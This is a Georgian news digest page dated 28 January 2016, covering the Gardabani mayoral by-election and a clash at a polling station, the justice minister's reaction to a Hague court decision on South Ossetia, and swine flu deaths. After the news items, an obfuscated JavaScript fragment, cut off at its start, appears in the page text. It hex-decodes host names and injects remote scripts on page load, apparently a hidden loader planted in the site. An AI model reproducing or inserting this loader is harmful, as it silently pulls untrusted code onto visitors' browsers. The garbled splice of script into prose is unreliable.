ფოკუსი

28 იანვარი,2016

- გარდაბანში გამგებლის რიგგარეშე არჩევნებზე ხმის მიცემის პროცესი დასრულდა. ცენტრალური საარჩევნო კომისიის ინფორმაციით, საღამოს 8 საათისთვის, ამომრჩეველთა აქტივობა 26%-ს აღემატებოდა. არჩევნებში ორი კანდიდატი მონაწილეობს - ბლოკ ერთიანი ნაციონალური მოძრაობიდან ბესიკ კახაბრიშვილი, ხოლო ქართული ოცნებიდან - გოჩა ჯამარაული.
დღის მანძილზე რამდენიმე ინციდენტი მოხდა. უბნების დახურვამდე ცოტა ხნით ადრე მე-2 უბანზე საქმე ფიზიკურ დაპირისპირებამდე მივიდა. შედეგად, დაშავდა ერთიანი ნაციონალური მოძრაობის მხარდამჭერი. პარტიის წარმომადგენლების თქმით, მათ მხარდამჭერებს თავს დაესხნენ, პოლიციას კი რეაქცია არ ჰქონია. ადგილზე მობილიზებული იყო რამდენიმე საპატრულო პოლიციისა და სასწრაფო დახმარების მანქანა.

- იუსტიციის მინისტრის თეა წულუკიანის შეფასებით, ჰააგის საერთაშორისო სასამართლოს გადაწყვეტილების ფორმულირებებისამართლებრივად სწორია და შეესაბამება საქართველოს ეროვნულ და სახელმწიფო ინტერესებს. როგორც წულუკიანმა დღეს გამართულ საგანგებო ბრიფინგზე აღნიშნა, ჰააგის სასამართლოს განცხადებაში არაერთხელ არის ნათქვამი, რომ ე.წ. სამხრეთ ოსეთი არ არის დამოუკიდებელი სახელმწიფო და ის საქართველოს ნაწილია.

- გრიპით ინფიცირებულთა რაოდენობა იზრდება. თბილისსა და აჭარაში ე.წ. ღორის გრიპით ბოლო 24 საათში ორი ადამიანი გარდაიცვალა. დადასტურდა, რომ ორივე შემთხვევა გრიპის ვირუსმა გამოიწვია, თუმცა ექიმების ინფორმაციით, რეალური მიზეზი დაგვიანებული მკურნალობა იყო.

o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]]]> //-->

კომენტარები